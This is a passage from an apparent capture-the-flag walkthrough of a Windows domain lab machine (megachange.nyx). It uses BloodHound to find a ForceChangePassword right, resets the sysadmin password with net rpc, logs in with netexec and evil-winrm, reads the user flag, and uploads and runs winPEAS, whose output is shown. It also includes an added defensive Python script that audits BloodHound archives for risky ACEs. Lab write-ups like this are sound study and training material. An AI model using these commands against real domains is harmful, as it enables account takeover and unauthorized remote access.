INFO: Compressing output into 20250628122018_bloodhound.zip
Now start BloodHound as you can see below. The wrapper starts neo4j and then the BloodHound server; the two ERROR lines about missing collector directories only concern the built-in SharpHound/AzureHound downloads, which we don't need because we already have the zip.
$ bloodhound
[sudo] contraseña para luis: 
Lo siento, pruebe otra vez.
[sudo] contraseña para luis: 

 Starting neo4j
Neo4j is running at pid 44002

 Bloodhound will start

 IMPORTANT: It will take time, please wait...

{"time":"2025-06-28T12:23:58.548655376+02:00","level":"INFO","message":"Reading configuration found at /etc/bhapi/bhapi.json"}
{"time":"2025-06-28T12:23:58.551425365+02:00","level":"INFO","message":"Logging configured"}
{"time":"2025-06-28T12:23:58.671781512+02:00","level":"INFO","message":"No database driver has been set for migration, using: neo4j"}
{"time":"2025-06-28T12:23:58.672086453+02:00","level":"INFO","message":"Connecting to graph using Neo4j"}
{"time":"2025-06-28T12:23:58.673871659+02:00","level":"INFO","message":"Starting daemon Tools API"}
{"time":"2025-06-28T12:23:58.72409862+02:00","level":"INFO","message":"No new SQL migrations to run"}
{"time":"2025-06-28T12:24:01.455917634+02:00","level":"ERROR","message":"Error generating AzureHound manifest file: error reading downloads directory /etc/bloodhound/collectors/azurehound: open /etc/bloodhound/collectors/azurehound: no such file or directory"}
{"time":"2025-06-28T12:24:01.456065911+02:00","level":"ERROR","message":"Error generating SharpHound manifest file: error reading downloads directory /etc/bloodhound/collectors/sharphound: open /etc/bloodhound/collectors/sharphound: no such file or directory"}
{"time":"2025-06-28T12:24:01.496402594+02:00","level":"INFO","message":"Analysis requested by init"}
{"time":"2025-06-28T12:24:01.508134041+02:00","level":"INFO","message":"Starting daemon API Daemon"}
{"time":"2025-06-28T12:24:01.508499026+02:00","level":"INFO","message":"Starting daemon Data Pruning Daemon"}
{"time":"2025-06-28T12:24:01.508934397+02:00","level":"INFO","message":"Starting daemon Data Pipe Daemon"}
{"time":"2025-06-28T12:24:01.509675838+02:00","level":"INFO","message":"Server started successfully"}
{"time":"2025-06-28T12:24:01.519671401+02:00","level":"INFO","message":"Running OrphanFileSweeper for path /var/lib/bhe/work/tmp"}
{"time":"2025-06-28T12:24:02.463310335+02:00","level":"INFO","message":"GET /","proto":"HTTP/1.1","referer":"","user_agent":"curl/8.14.1","request_bytes":0,"response_bytes":38,"status":301,"elapsed":2.084736,"request_id":"6228bb9b-c13a-4262-9b39-3b52b723504b","request_ip":"127.0.0.1","remote_addr":"127.0.0.1:55178"}
http://127.0.0.1:8080
The next steps were done in the BloodHound web interface (logging in at the address above, uploading the zip produced by bloodhound.py and looking at what alfredo has control over); they were shown as screenshots, which are not reproduced here.
BloodHound shows that alfredo holds a right over sysadmin that allows resetting that account's password (the edge BloodHound labels ForceChangePassword), so we can set a new password for sysadmin with the command you can see below. Keep in mind this is a reset, not a recovery: it changes the password on the DC (logged there as event 4724, "An attempt was made to reset an account's password") and the account's owner will notice at the next logon.
  • net rpc password "sysadmin" "Password123" -U "megachange.nyx"/"alfredo"%"Password1" -S "192.168.88.7"
┌──(luis㉿kali)-[~]
└─$ net rpc password "sysadmin" "Password123" -U "megachange.nyx"/"alfredo"%"Password1" -S "192.168.88.7"
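To find such rights before an attacker does, the same archive bloodhound.py produced above can be audited offline. The following is an added example (not code from the write-up or from the BloodHound project) that loads a bloodhound.py --zip archive and lists dangerous ACEs on user objects held by principals other than the built-in admin groups; the archive it builds in memory is constructed, with a placeholder domain SID and the RIDs from the --rid-brute output.

```python
"""
Audit a bloodhound.py --zip archive (BloodHound legacy v4 JSON) for
dangerous ACEs on user objects held by principals that are not built-in
administrators. The right that let alfredo reset sysadmin's password is
what BloodHound calls ForceChangePassword.

Added example, not code from the page or the BloodHound project. The
archive built below is CONSTRUCTED to resemble bloodhound.py output: the
domain SID is a placeholder and the RIDs come from the --rid-brute output
above (500 Administrator, 512 Domain Admins, 1103 alfredo, 1104 sysadmin).
"""
import io
import json
import zipfile

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"   # placeholder, not the real one

# Rights that let the holder take over the target object or its password
DANGEROUS_RIGHTS = {"ForceChangePassword", "GenericAll", "GenericWrite",
                    "WriteDacl", "WriteOwner", "AllExtendedRights", "Owns"}
# Principals expected to hold such rights: Administrator, Domain Admins and
# Enterprise Admins (domain RIDs), plus BUILTIN\Administrators and SYSTEM.
EXPECTED_ADMIN_RIDS = {"500", "512", "519"}
EXPECTED_ADMIN_SIDS = {"S-1-5-32-544", "S-1-5-18"}


def bh_user(rid, name, aces):
    """Minimal user object in the BloodHound v4 JSON shape (constructed)."""
    return {"ObjectIdentifier": f"{DOMAIN_SID}-{rid}",
            "Properties": {"name": f"{name}@MEGACHANGE.NYX", "domain": "MEGACHANGE.NYX"},
            "Aces": aces}


def ace(rid, ptype, right, inherited=False):
    return {"PrincipalSID": f"{DOMAIN_SID}-{rid}", "PrincipalType": ptype,
            "RightName": right, "IsInherited": inherited}


SAMPLE_USERS = {"data": [
    bh_user(500, "ADMINISTRATOR", [ace(512, "Group", "GenericAll", True)]),
    bh_user(1103, "ALFREDO", [ace(512, "Group", "GenericAll", True)]),
    bh_user(1104, "SYSADMIN", [ace(512, "Group", "GenericAll", True),
                                ace(1103, "User", "ForceChangePassword")]),
], "meta": {"type": "users", "count": 3, "version": 5}}

SAMPLE_GROUPS = {"data": [
    {"ObjectIdentifier": f"{DOMAIN_SID}-512",
     "Properties": {"name": "DOMAIN ADMINS@MEGACHANGE.NYX", "domain": "MEGACHANGE.NYX"},
     "Aces": []},
], "meta": {"type": "groups", "count": 1, "version": 5}}


def is_expected_admin(sid):
    if sid in EXPECTED_ADMIN_SIDS:
        return True
    return sid.startswith("S-1-5-21-") and sid.rsplit("-", 1)[-1] in EXPECTED_ADMIN_RIDS


def build_name_map(collections):
    """ObjectIdentifier -> display name, across every collection in the archive."""
    return {obj["ObjectIdentifier"]: obj["Properties"]["name"]
            for coll in collections for obj in coll["data"]}


def find_risky_aces(users, names):
    """Dangerous rights on user objects held by non-admin principals."""
    findings = []
    for user in users["data"]:
        for a in user.get("Aces", []):
            if a["RightName"] in DANGEROUS_RIGHTS and not is_expected_admin(a["PrincipalSID"]):
                findings.append({"principal": names.get(a["PrincipalSID"], a["PrincipalSID"]),
                                 "right": a["RightName"],
                                 "target": user["Properties"]["name"],
                                 "inherited": a.get("IsInherited", False)})
    return findings


def audit_zip(archive):
    """archive: path or file object of a bloodhound.py --zip output."""
    collections, users = [], None
    with zipfile.ZipFile(archive) as zf:
        for name in zf.namelist():
            if name.endswith(".json"):
                data = json.loads(zf.read(name))
                collections.append(data)
                if data.get("meta", {}).get("type") == "users":
                    users = data
    if users is None:
        raise ValueError("archive contains no users collection")
    return find_risky_aces(users, build_name_map(collections))


def build_sample_zip():
    """In-memory stand-in for the 20250628122018_bloodhound.zip written above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("20250628122018_users.json", json.dumps(SAMPLE_USERS))
        zf.writestr("20250628122018_groups.json", json.dumps(SAMPLE_GROUPS))
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for f in audit_zip(build_sample_zip()):
        print(f"{f['principal']} has {f['right']} on {f['target']} (inherited={f['inherited']})")
```

Pass a real archive path to audit_zip to run it against the collector's actual output; a non-inherited ForceChangePassword or GenericAll held by an ordinary user is the finding to fix with a DACL cleanup.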
Now verify that the new password works with the command you can see below.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb 192.168.88.7 -u sysadmin -p Password123
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\sysadmin:Password123 

Again the important part is to check whether this account can get a shell on the machine. The proper WinRM check with netexec is:
  • netexec winrm 192.168.88.7 -u 'sysadmin' -p 'Password123'
As before, the command actually run below passes evil-winrm as a second SMB target rather than selecting the WinRM protocol, so it only re-confirms the SMB login.
┌──(root㉿kali)-[/home/luis]
└─# netexec smb evil-winrm 192.168.88.7 -u sysadmin -p Password123
SMB         192.168.88.7    445    CHANGE           [*] Windows 10 / Server 2019 Build 17763 x64 (name:CHANGE) (domain:megachange.nyx) (signing:True) (SMBv1:False)
SMB         192.168.88.7    445    CHANGE           [+] megachange.nyx\sysadmin:Password123
Running nxc against 2 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Now let's try to get a shell on the Windows machine as sysadmin with evil-winrm:
  • evil-winrm -i 192.168.88.7 -u 'sysadmin' -p 'Password123'
┌──(root㉿kali)-[/home/luis]
└─# evil-winrm -i 192.168.88.7 -u sysadmin -p Password123
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

This time we get a shell. To obtain the user flag (and later the root flag), move from the Documents folder up to the profile root and then into Desktop, as you can see below:
  • cd .. (go up one directory)
  • ls (list folders and files)
  • cd Desktop (change into the Desktop directory)
*Evil-WinRM* PS C:\Users\sysadmin\Documents> cd ..
*Evil-WinRM* PS C:\Users\sysadmin> ls


    Directory: C:\Users\sysadmin


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2025   9:29 PM                Desktop
d-r---         3/7/2025   4:01 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\sysadmin> cd Desktop
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> ls


    Directory: C:\Users\sysadmin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/7/2025   6:21 PM             70 user.txt

Gotcha! The user flag is in the Desktop folder, at the path below; read it with type:
  • C:\Users\sysadmin\Desktop\user.txt
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> type user.txt
01c920617c6470cdf46ba5861ce701c2
*Evil-WinRM* PS C:\Users\sysadmin\Desktop>
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> whoami
megachange\sysadmin
*Evil-WinRM* PS C:\Users\sysadmin\Desktop> cd ..
*Evil-WinRM* PS C:\Users\sysadmin> ls


    Directory: C:\Users\sysadmin


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         3/7/2025   9:29 PM                Desktop
d-r---         3/7/2025   4:01 PM                Documents
d-r---        9/15/2018  12:19 AM                Downloads
d-r---        9/15/2018  12:19 AM                Favorites
d-r---        9/15/2018  12:19 AM                Links
d-r---        9/15/2018  12:19 AM                Music
d-r---        9/15/2018  12:19 AM                Pictures
d-----        9/15/2018  12:19 AM                Saved Games
d-r---        9/15/2018  12:19 AM                Videos


*Evil-WinRM* PS C:\Users\sysadmin> cd ..
*Evil-WinRM* PS C:\Users> ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         3/7/2025   7:11 PM                Administrator
d-r---         3/7/2025   3:38 AM                Public
d-----         3/7/2025   4:01 PM                sysadmin

*Evil-WinRM* PS C:\Users> cd Administrator
*Evil-WinRM* PS C:\Users\Administrator> ls
Access to the path 'C:\Users\Administrator' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Administrator:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand

We are inside the machine, but C:\Users\Administrator is denied to sysadmin (PermissionDenied), so the next step is privilege escalation: first we find out what privileges this user has on the machine, with the commands you can see below.

Now download winPEAS from the link below; it enumerates the local privilege-escalation vectors available to this user (it does not grant privileges by itself):
┌──(root㉿kali)-[/home/luis/Descargas]
└─# wget https://github.com/peass-ng/PEASS-ng/releases/download/20250601-88c7a0f6/winPEASx64_ofs.exe
--2025-06-28 12:42:24--  https://github.com/peass-ng/PEASS-ng/releases/download/20250601-88c7a0f6/winPEASx64_ofs.exe
Resolviendo github.com (github.com)... 140.82.121.4
Conectando con github.com (github.com)[140.82.121.4]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ca7b33a7-72bd-4039-a878-8d8946997c34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T104236Z&X-Amz-Expires=1800&X-Amz-Signature=1fa15f96d69d5d2e2630a6016b9ba111951556b2719992182bbd785981957ddd&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DwinPEASx64_ofs.exe&response-content-type=application%2Foctet-stream [siguiendo]
--2025-06-28 12:42:25--  https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/ca7b33a7-72bd-4039-a878-8d8946997c34?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250628%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250628T104236Z&X-Amz-Expires=1800&X-Amz-Signature=1fa15f96d69d5d2e2630a6016b9ba111951556b2719992182bbd785981957ddd&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DwinPEASx64_ofs.exe&response-content-type=application%2Foctet-stream
Resolviendo objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Conectando con objects.githubusercontent.com (objects.githubusercontent.com)[185.199.111.133]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 10010624 (9,5M) [application/octet-stream]
Grabando a: «winPEASx64_ofs.exe»

winPEASx64_ofs.exe              100%[=====================================================>]   9,55M  33,6MB/s    en 0,3s    

2025-06-28 12:42:26 (33,6 MB/s) - «winPEASx64_ofs.exe» guardado [10010624/10010624]
With the file downloaded, log back into the machine and upload it with evil-winrm's upload command, as you can see below.
┌──(root㉿kali)-[/home/luis/Descargas]
└─# evil-winrm -i 192.168.88.7 -u sysadmin -p Password123
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                       
*Evil-WinRM* PS C:\Users\sysadmin\Documents> upload winPEASx64_ofs.exe
                                        
Info: Uploading /home/luis/Descargas/winPEASx64_ofs.exe to C:\Users\sysadmin\Documents\winPEASx64_ofs.exe
                                        
Data: 13347496 bytes of 13347496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sysadmin\Documents> ls


    Directory: C:\Users\sysadmin\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/28/2025  12:47 PM       10010624 winPEASx64_ofs.exe
Let's run it to see whether it finds any passwords, interesting paths or other escalation vectors, as you can see below. The enumeration continues even though the WMI query for Win32_UserAccount is denied to this user.

*Evil-WinRM* PS C:\Users\sysadmin\Documents> ./winPEASx64_ofs.exe
 [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\
       |                             Do you like PEASS?                                  |
       |---------------------------------------------------------------------------------|
       |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |
       |         Follow on Twitter         :     @hacktricks_live                        |
       |         Respect on HTB            :     SirBroccoli                             |
       |---------------------------------------------------------------------------------|
       |                                 Thank you!                                      |
       \---------------------------------------------------------------------------------/

  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: https://book.hacktricks.wiki/en/windows-hardening/checklist-windows-privilege-escalation.html
   Creating Dynamic lists, this could take a while, please wait...
   - Loading sensitive_files yaml definitions file...
   - Loading regexes yaml definitions file...
   - Checking if domain...
   - Getting Win32_UserAccount info...
Error while getting Win32_UserAccount info: System.Management.ManagementException: Access denied
   at System.Management.ThreadDispatch.Start()
   at System.Management.ManagementScope.Initialize()
   at System.Management.ManagementObjectSearcher.Initialize()
   at System.Management.ManagementObjectSearcher.Get()
   at winPEAS.Checks.Checks.a(Boolean A_0)
   - Creating current user groups list...
   - Creating active users list (local only)...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating disabled users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Admin users list...
  [X] Exception: Object reference not set to an instance of an object.
   - Creating AppLocker bypass list...
   - Creating files/directories list for search...


ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ System Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Basic System Information
È Check if the Windows versions is vulnerable to some known exploit https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#version-exploits
  [X] Exception: Access is denied

ÉÍÍÍÍÍÍÍÍÍ͹ Showing All Microsoft Updates
  [X] Exception: Creating an instance of the COM component with CLSID {B699E5E8-67FF-4177-88B0-3684A3388BFB} from the IClassFactory failed due to the following error: 80070005 Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)).

ÉÍÍÍÍÍÍÍÍÍ͹ System Last Shutdown Date/time (from Registry)

    Last Shutdown Date/time        :    6/28/2025 1:04:01 PM

ÉÍÍÍÍÍÍÍÍÍ͹ User Environment Variables
È Check for some passwords or keys in the env variables 
    COMPUTERNAME: CHANGE
    PUBLIC: C:\Users\Public
    LOCALAPPDATA: C:\Users\sysadmin\AppData\Local
    PSModulePath: C:\Users\sysadmin\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    PROCESSOR_ARCHITECTURE: AMD64
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\sysadmin\AppData\Local\Microsoft\WindowsApps
    CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
    ProgramFiles(x86): C:\Program Files (x86)
    PROCESSOR_LEVEL: 6
    ProgramFiles: C:\Program Files
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
    USERPROFILE: C:\Users\sysadmin
    SystemRoot: C:\Windows
    ALLUSERSPROFILE: C:\ProgramData
    DriverData: C:\Windows\System32\Drivers\DriverData
    ProgramData: C:\ProgramData
    PROCESSOR_REVISION: 7e05
    USERNAME: sysadmin
    CommonProgramW6432: C:\Program Files\Common Files
    CommonProgramFiles: C:\Program Files\Common Files
    OS: Windows_NT
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 126 Stepping 5, GenuineIntel
    ComSpec: C:\Windows\system32\cmd.exe
    SystemDrive: C:
    TEMP: C:\Users\sysadmin\AppData\Local\Temp
    NUMBER_OF_PROCESSORS: 1
    APPDATA: C:\Users\sysadmin\AppData\Roaming
    TMP: C:\Users\sysadmin\AppData\Local\Temp
    ProgramW6432: C:\Program Files
    windir: C:\Windows
    USERDOMAIN: MEGACHANGE
    USERDNSDOMAIN: megachange.nyx

ÉÍÍÍÍÍÍÍÍÍ͹ System Environment Variables
È Check for some passwords or keys in the env variables 
    ComSpec: C:\Windows\system32\cmd.exe
    DriverData: C:\Windows\System32\Drivers\DriverData
    OS: Windows_NT
    Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
    PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
    PROCESSOR_ARCHITECTURE: AMD64
    PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
    TEMP: C:\Windows\TEMP
    TMP: C:\Windows\TEMP
    USERNAME: SYSTEM
    windir: C:\Windows
    NUMBER_OF_PROCESSORS: 1
    PROCESSOR_LEVEL: 6
    PROCESSOR_IDENTIFIER: Intel64 Family 6 Model 126 Stepping 5, GenuineIntel
    PROCESSOR_REVISION: 7e05

ÉÍÍÍÍÍÍÍÍÍ͹ Audit Settings
È Check what is being logged 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Audit Policy Settings - Classic & Advanced

ÉÍÍÍÍÍÍÍÍÍ͹ WEF Settings
È Windows Event Forwarding, is interesting to know were are sent the logs 
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ LAPS Settings
È If installed, local administrator password is changed frequently and is restricted by ACL 
    LAPS Enabled: LAPS not installed

ÉÍÍÍÍÍÍÍÍÍ͹ Wdigest
È If enabled, plain-text crds could be stored in LSASS https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wdigest
    Wdigest is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ LSA Protection
È If enabled, a driver is needed to read LSASS memory (If Secure Boot or UEFI, RunAsPPL cannot be disabled by deleting the registry key) https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#lsa-protection
    LSA Protection is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ Credentials Guard
È If enabled, a driver is needed to read LSASS memory https://book.hacktricks.wiki/windows-hardening/stealing-credentials/credentials-protections#credentials-guard
    CredentialGuard is not enabled

ÉÍÍÍÍÍÍÍÍÍ͹ Cached Creds
È If > 0, credentials will be cached in the registry and accessible by SYSTEM user https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#cached-credentials
    cachedlogonscount is 10

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating saved credentials in Registry (CurrentPass)

ÉÍÍÍÍÍÍÍÍÍ͹ AV Information
  [X] Exception: Invalid namespace 
    No AV was detected!!
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Windows Defender configuration
  Local Settings
  Group Policy Settings

ÉÍÍÍÍÍÍÍÍÍ͹ UAC Status
È If you are in the Administrators group check how to bypass the UAC https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#from-administrator-medium-to-high-integrity-level--uac-bypasss
    ConsentPromptBehaviorAdmin: 5 - PromptForNonWindowsBinaries
    EnableLUA: 1
    LocalAccountTokenFilterPolicy: 
    FilterAdministratorToken: 1
      [*] LocalAccountTokenFilterPolicy set to 0 and FilterAdministratorToken == 1.
      [-] No local accounts can be used for lateral movement.

ÉÍÍÍÍÍÍÍÍÍ͹ PowerShell Settings
    PowerShell v2 Version: 2.0
    PowerShell v5 Version: 5.1.17763.1
    PowerShell Core Version: 
    Transcription Settings: 
    Module Logging Settings: 
    Scriptblock Logging Settings: 
    PS history file: 
    PS history size: 

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating PowerShell Session Settings using the registry
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ PS default transcripts history
È Read the PS history inside these files (if any)

ÉÍÍÍÍÍÍÍÍÍ͹ HKCU Internet Settings
    DisableCachingOfSSLPages: 0
    IE5_UA_Backup_Flag: 5.0
    PrivacyAdvanced: 1
    SecureProtocols: 2048
    User Agent: Mozilla/4.0 (compatible; MSIE 8.0; Win32)
    CertificateRevocation: 1
    ZonesSecurityUpgrade: System.Byte[]

ÉÍÍÍÍÍÍÍÍÍ͹ HKLM Internet Settings
    ActiveXCache: C:\Windows\Downloaded Program Files
    CodeBaseSearchPath: CODEBASE
    EnablePunycode: 1
    MinorVersion: 0
    WarnOnIntranet: 1

ÉÍÍÍÍÍÍÍÍÍ͹ Drives Information
È Remember that you should search more info inside the other drives 
    C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 34 GB)(Permissions: Users [Allow: AppendData/CreateDirectories])
    D:\ (Type: CDRom)

ÉÍÍÍÍÍÍÍÍÍ͹ Checking WSUS
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#wsus
    Not Found

ÉÍÍÍÍÍÍÍÍÍ͹ Checking KrbRelayUp
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#krbrelayup
  The system is inside a domain (MEGACHANGE) so it could be vulnerable.
È You can try https://github.com/Dec0ne/KrbRelayUp to escalate privileges

ÉÍÍÍÍÍÍÍÍÍ͹ Checking If Inside Container
È If the binary cexecsvc.exe or associated service exists, you are inside Docker 
You are NOT inside a container

ÉÍÍÍÍÍÍÍÍÍ͹ Checking AlwaysInstallElevated
È  https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#alwaysinstallelevated
    AlwaysInstallElevated isn't available

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerate LSA settings - auth packages included

    auditbasedirectories                 :       0
    auditbaseobjects                     :       0
    Bounds                               :       00-30-00-00-00-20-00-00
    crashonauditfail                     :       0
    fullprivilegeauditing                :       00
    LimitBlankPasswordUse                :       1
    NoLmHash                             :       1
    Security Packages                    :       ""
    Notification Packages                :       rassfm,scecli
    Authentication Packages              :       msv1_0
    LsaPid                               :       528
    LsaCfgFlagsDefault                   :       0
    SecureBoot                           :       1
    ProductType                          :       7
    disabledomaincreds                   :       0
    everyoneincludesanonymous            :       0
    forceguest                           :       0
    restrictanonymous                    :       0
    restrictanonymoussam                 :       1

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating NTLM Settings
  LanmanCompatibilityLevel    :  (Send NTLMv2 response only - Win7+ default)


  NTLM Signing Settings
      ClientRequireSigning    : False
      ClientNegotiateSigning  : True
      ServerRequireSigning    : True
      ServerNegotiateSigning  : True
      LdapSigning             : Negotiate signing (Negotiate signing)

  Session Security
      NTLMMinClientSec        : 536870912 (Require 128-bit encryption)
      NTLMMinServerSec        : 536870912 (Require 128-bit encryption)


  NTLM Auditing and Restrictions
      InboundRestrictions     :  (Not defined)
      OutboundRestrictions    :  (Not defined)
      InboundAuditing         :  (Not defined)
      OutboundExceptions      :

ÉÍÍÍÍÍÍÍÍÍ͹ Display Local Group Policy settings - local users/machine

ÉÍÍÍÍÍÍÍÍÍ͹ Checking AppLocker effective policy
   AppLockerPolicy version: 1
   listing rules:



ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Printers (WMI)

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Named Pipes
  Name                                                                                                 CurrentUserPerms                                                       Sddl

  eventlog                                                                                             Everyone [Allow: WriteData/CreateFiles]                                O:LSG:LSD:P(A;;0x12019b;;;WD)(A;;CC;;;OW)(A;;0x12008f;;;S-1-5-80-880578595-1860270145-482643319-2788375705-1540778122)

  ROUTER                                                                                               Everyone [Allow: WriteData/CreateFiles]                                O:SYG:SYD:P(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;SY)

  RpcProxy\49674                                                                                       Everyone [Allow: WriteData/CreateFiles]                                O:BAG:SYD:(A;;0x12019b;;;WD)(A;;0x12019b;;;AN)(A;;FA;;;BA)

  RpcProxy\593                                                                                         Everyone [Allow: WriteData/CreateFiles]                                O:NSG:NSD:(A;;0x12019b;;;WD)(A;;RC;;;OW)(A;;0x12019b;;;AN)(A;;FA;;;S-1-5-80-521322694-906040134-3864710659-1525148216-3451224162)(A;;FA;;;S-1-5-80-979556362-403687129-3954533659-2335141334-1547273080)


ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating AMSI registered providers
    Provider:       {2781761E-28E0-4109-99FE-B9D127C57AFE}
    Path:

   =================================================================================================


ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon configuration
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Enumerating Sysmon process creation logs (1)
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Installed .NET versions



ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ͹ Interesting Events information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍ͹ Printing Explicit Credential Events (4648) for last 30 days - A process logged on using plaintext credentials

      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Printing Account Logon Events (4624) for the last 10 days.

      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍ͹ Process creation events - searching logs (EID 4688) for sensitive data.

      You must be an administrator to run this check

